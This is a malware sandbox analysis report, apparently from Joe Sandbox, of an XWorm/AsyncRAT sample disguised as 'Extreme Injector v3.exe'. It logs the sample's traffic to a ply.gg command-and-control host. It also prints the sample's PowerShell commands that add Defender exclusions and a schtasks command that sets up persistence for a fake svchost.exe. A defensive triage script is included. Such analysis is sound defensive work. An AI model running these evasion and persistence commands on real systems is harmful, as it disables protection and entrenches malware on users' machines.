Dec 31, 2024 00:48:37.468070984 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 31, 2024 00:48:37.468151093 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:49:10.402436018 CET | 49823 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:10.407358885 CET | 43985 | 49823 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:10.407424927 CET | 49823 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:10.616890907 CET | 49823 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:10.621728897 CET | 43985 | 49823 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:24.694824934 CET | 49823 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:24.699625015 CET | 43985 | 49823 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:31.761749029 CET | 43985 | 49823 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:31.762038946 CET | 49823 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:31.768636942 CET | 49823 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:31.769937992 CET | 49920 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:31.773477077 CET | 43985 | 49823 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:31.774791956 CET | 43985 | 49920 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:31.777932882 CET | 49920 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:31.805628061 CET | 49920 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:31.810437918 CET | 43985 | 49920 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:39.926505089 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:49:40.237323046 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:49:40.846682072 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:49:42.049932003 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:49:44.456182957 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:49:44.769539118 CET | 49920 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:44.774306059 CET | 43985 | 49920 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:49.268565893 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:49:53.183195114 CET | 43985 | 49920 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:53.183589935 CET | 49920 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:54.390522003 CET | 49920 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:54.395438910 CET | 43985 | 49920 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:54.401177883 CET | 50005 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:54.406040907 CET | 43985 | 50005 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:54.408551931 CET | 50005 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:54.780415058 CET | 50005 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:49:54.785299063 CET | 43985 | 50005 | 147.185.221.24 | 192.168.2.4
Dec 31, 2024 00:49:58.877955914 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:50:04.784503937 CET | 50005 | 43985 | 192.168.2.4 | 147.185.221.24
Dec 31, 2024 00:50:04.789463997 CET | 43985 | 50005 | 147.185.221.24 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 00:47:59.386367083 CET | 59007 | 53 | 192.168.2.4 | 1.1.1.1
Dec 31, 2024 00:47:59.393440008 CET | 53 | 59007 | 1.1.1.1 | 192.168.2.4
Dec 31, 2024 00:49:10.371889114 CET | 63903 | 53 | 192.168.2.4 | 1.1.1.1
Dec 31, 2024 00:49:10.383852005 CET | 53 | 63903 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 00:47:59.386367083 CET | 192.168.2.4 | 1.1.1.1 | 0x8023 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:49:10.371889114 CET | 192.168.2.4 | 1.1.1.1 | 0xbdc1 | Standard query (0) | or-officials.gl.at.ply.gg | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 00:47:59.393440008 CET | 1.1.1.1 | 192.168.2.4 | 0x8023 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:49:10.383852005 CET | 1.1.1.1 | 192.168.2.4 | 0xbdc1 | No error (0) | or-officials.gl.at.ply.gg | | 147.185.221.24 | A (IP address) | IN (0x0001) | false
• ip-api.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 7412 | C:\Users\user\Desktop\Extreme Injector v3.exe

Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 00:47:59.405189991 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 31, 2024 00:47:59.908580065 CET | 175 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 23:47:59 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false
Target ID: 0
Start time: 18:47:54
Start date: 30/12/2024
Path: C:\Users\user\Desktop\Extreme Injector v3.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\Extreme Injector v3.exe"
Imagebase: 0x360000
File size: 70'656 bytes
MD5 hash: C55BAF4BB32F9FE3D218F67CA63CA5B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation: low
                                                                                    Has exited:false

                                                                                    Target ID:1
                                                                                    Start time:18:47:58
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:18:47:58
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:18:48:05
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:18:48:05
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:18:48:19
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:18:48:19
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:18:48:34
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:18:48:34
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:18:49:03
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                    Imagebase:0x7ff70f330000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:18:49:03
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:18:49:03
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Imagebase:0xa70000
                                                                                    File size:70'656 bytes
                                                                                    MD5 hash:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:18:49:16
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                    Imagebase:0xa10000
                                                                                    File size:70'656 bytes
                                                                                    MD5 hash:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:18:49:24
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                    Imagebase:0xdd0000
                                                                                    File size:70'656 bytes
                                                                                    MD5 hash:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:18:50:01
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    Imagebase:0x390000
                                                                                    File size:70'656 bytes
                                                                                    MD5 hash:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false


                                                                                      Execution Graph

                                                                                      Execution Coverage:22.2%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:42.9%
                                                                                      Total number of Nodes:7
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph (rendered graph):
                                                                                      • 7ffd9b8979e1 -> 7ffd9b8979ff CheckRemoteDebuggerPresent -> 7ffd9b897a9f
                                                                                      • 7ffd9b899074 -> 7ffd9b89907d -> 7ffd9b8991f2 RtlSetProcessIsCritical -> 7ffd9b899252

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: SAN_^
                                                                                      • API String ID: 0-3629432999
                                                                                      • Opcode ID: a2fae7624d35f7af847093104803bec3947d301f43d48b88aa92f5df3f364e5d
                                                                                      • Instruction ID: 767507a608c5e778902e2ee2639e3e9a888aade40a6013e657104ac038c78ec4
                                                                                      • Opcode Fuzzy Hash: a2fae7624d35f7af847093104803bec3947d301f43d48b88aa92f5df3f364e5d
                                                                                      • Instruction Fuzzy Hash: 03420971B1DA095FEB98FB7C98696B977D2FF98310F410579E00EC32D6DE24A9018741

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: 781e3aa16e77550cab32f4de6742349c54562b5d4e1ff2666ee8b6c466e4e769
                                                                                      • Instruction ID: bd306a858b49672389e246a11086bce840573e42b7606b623987efb70c317e85
                                                                                      • Opcode Fuzzy Hash: 781e3aa16e77550cab32f4de6742349c54562b5d4e1ff2666ee8b6c466e4e769
                                                                                      • Instruction Fuzzy Hash: 1A511130A0D79C8FDB59DF6888556E97FF0FF1A320F0502ABD459C7192DB28A945C781

                                                                                      Control-flow Graph

                                                                                      control_flow_graph (rendered graph): basic blocks 7ffd9b896026 .. 7ffd9b8964e2; block 7ffd9b896463-7ffd9b8964c8 calls 7ffd9b8964e4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fbddbf6da8fe789b309a6009d518955f72657858c8e167ffc541d10e9cce030b
                                                                                      • Instruction ID: 155c21109287ec65f517accc19ae75eaac3e9ef1c91d3b16788808b6ec2dc902
                                                                                      • Opcode Fuzzy Hash: fbddbf6da8fe789b309a6009d518955f72657858c8e167ffc541d10e9cce030b
                                                                                      • Instruction Fuzzy Hash: 91F1E870A09A4E8FEFA8DF68C8557E93BD1FF58350F04426EE84DC7295CB3499418B81

Control-flow Graph

• Executed
• Not Executed
• Graph data (edge list omitted): basic blocks 7ffd9b896dd2-7ffd9b89725e, with one call to 7ffd9b897260 from block 7ffd9b8971e2-7ffd9b897244
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1183668eae0e08de9b22f681ed4a662e2bbc3a0cc1239556f3d9329e1bcba969
                                                                                      • Instruction ID: 4a723f00e4a1d1ef936df23208a60bc6a26ccc5de6f2d4da1e446d4fe5b2d1aa
                                                                                      • Opcode Fuzzy Hash: 1183668eae0e08de9b22f681ed4a662e2bbc3a0cc1239556f3d9329e1bcba969
                                                                                      • Instruction Fuzzy Hash: 8DE1B430A09A4E8FEFA8DF28C8657E97BD1FF58310F14426AE84DC7295DF7499418B81

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9df68d30e31f9471229331473c2eb3e4007fad725a6958847f04e35e73ab9347
                                                                                      • Instruction ID: 6c6d3cdea9313d625186c2de1f23c080ca06f1dbe2a0fd6223d33684785efc70
                                                                                      • Opcode Fuzzy Hash: 9df68d30e31f9471229331473c2eb3e4007fad725a6958847f04e35e73ab9347
                                                                                      • Instruction Fuzzy Hash: 05C1A360B1D9094FEF9DEBAC94756B97BD2EF9C300F05017AE05EC32E6DE28A9024741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68482e1ac9327cf871b4981264ae5c6ebd9b391ccd42b95a698fa1a98676540b
                                                                                      • Instruction ID: 25c637e18a158ea6a4f7c97e7c3924139bf904a112c275951f4254c14209607e
                                                                                      • Opcode Fuzzy Hash: 68482e1ac9327cf871b4981264ae5c6ebd9b391ccd42b95a698fa1a98676540b
                                                                                      • Instruction Fuzzy Hash: FE511310B1E6C94FEB9AABB858746756FE5DF8B219B0900FBE0D9C71E7DD081806C342

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2695349919-0
                                                                                      • Opcode ID: 6c83a3d8e3ff2393646a6888f9cc9a895bdcbd570808944a3fd7ef0a189e03ca
                                                                                      • Instruction ID: e7d603a39ff3f87f7518ee6bdab5309938ddf2314ec98c086c873589dfddac01
                                                                                      • Opcode Fuzzy Hash: 6c83a3d8e3ff2393646a6888f9cc9a895bdcbd570808944a3fd7ef0a189e03ca
                                                                                      • Instruction Fuzzy Hash: D561263190CA4D8FDB19DBA8DC596E97BF0FF59310F04426ED09AC3292DB346946CB91
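The CriticalProcess API ID above corresponds to the report's "Protects its processes via BreakOnTermination flag" signature: a process with that flag set bugchecks the machine when it is terminated, so a responder who simply kills the implant gets a blue screen instead of containment. The following is an added triage check, not code from the Joe Sandbox report or from the sample, that lists every process carrying the flag. It reads the flag with NtQueryInformationProcess and the ProcessBreakOnTermination information class (0x1D), opening each process with PROCESS_QUERY_INFORMATION only; the function and type names (Get-CriticalProcessFlag, NativeProc) are this example's own.

```powershell
# Added example (not part of the Joe Sandbox report): find processes whose
# BreakOnTermination ("critical process") flag is set before terminating anything.
$native = @"
using System;
using System.Runtime.InteropServices;
public static class NativeProc {
    public const int PROCESS_QUERY_INFORMATION = 0x0400;
    public const int ProcessBreakOnTermination = 0x1D;   // PROCESSINFOCLASS value

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(int access, bool inherit, int pid);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);

    // Returns an NTSTATUS; 0 is STATUS_SUCCESS. info receives a ULONG (0 = not critical).
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(
        IntPtr h, int infoClass, out uint info, int infoLen, out int returnLen);
}
"@
Add-Type -TypeDefinition $native

function Get-CriticalProcessFlag {
    param([int]$ProcessId)
    # Query rights only; no SeDebugPrivilege is needed to read the flag on processes
    # the caller can open. Protected/system processes may still refuse the handle.
    $h = [NativeProc]::OpenProcess([NativeProc]::PROCESS_QUERY_INFORMATION, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) { return $null }   # access denied: unknown, not "false"
    try {
        $flag = [uint32]0
        $len  = 0
        $status = [NativeProc]::NtQueryInformationProcess(
            $h, [NativeProc]::ProcessBreakOnTermination, [ref]$flag, 4, [ref]$len)
        if ($status -ne 0) { return $null }        # NTSTATUS failure: treat as unknown
        return ($flag -ne 0)
    } finally {
        [void][NativeProc]::CloseHandle($h)
    }
}

# Report every flagged process with its image path, so a system-process name running
# from a user-writable directory (another signature in this report) stands out.
Get-Process | ForEach-Object {
    if (Get-CriticalProcessFlag -ProcessId $_.Id) {
        [pscustomobject]@{ PID = $_.Id; Name = $_.ProcessName; Path = $_.Path }
    }
} | Format-Table -AutoSize
```

Run it elevated so that system processes can be opened; expect legitimate hits for csrss.exe, smss.exe, wininit.exe and services.exe, which Windows marks critical by design. Any other entry, and especially one whose image path is under a user profile or temp directory, is the one to isolate. Clearing the flag on an implant (NtSetInformationProcess with the same class and a zero value) requires SeDebugPrivilege and should be done before the process is killed; killing it while the flag is set takes the host down.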
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2935550153.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_Extreme Injector v3.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5fede156d923f891833931cda880eb0b4a3f20a703637dd8d0320b04eff6c336
                                                                                      • Instruction ID: 0368709288c3512d7c1fb34573d39bf521754b126f6cb998d4b712a8bccf5f90
                                                                                      • Opcode Fuzzy Hash: 5fede156d923f891833931cda880eb0b4a3f20a703637dd8d0320b04eff6c336
                                                                                      • Instruction Fuzzy Hash: 4BA1AF87B0F7E62EFB2267A818B51D57F60DF57265B0B00F7C1D58B0B3A809790683A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1160750325bf47514edab65d10be8e4a4959a18cec089267276369deb70dc2d
                                                                                      • Instruction ID: 3cedc03bb12587e2757fdcf314ab8ff947ff71198e3722b8a72e54167ae62da9
                                                                                      • Opcode Fuzzy Hash: c1160750325bf47514edab65d10be8e4a4959a18cec089267276369deb70dc2d
                                                                                      • Instruction Fuzzy Hash: 41D19070A08A4D8FDF99DF5CC465AA97BF1FF68340F1541AAD40DD72A6CA34E881CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c7f6f953637f984fa2eeefa0cebc114aca5a4e9f50305fd433e446ffa4e927f4
                                                                                      • Instruction ID: d7414bfbe2e4ccc38fe4fe36709f39771ab550fcbfc96ffe22c294960f9e5172
                                                                                      • Opcode Fuzzy Hash: c7f6f953637f984fa2eeefa0cebc114aca5a4e9f50305fd433e446ffa4e927f4
                                                                                      • Instruction Fuzzy Hash: 15C16832B1FA8E9FEBA8EBA858655B57BD1EF51314F0901BED45CC70E3DA18AC018341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
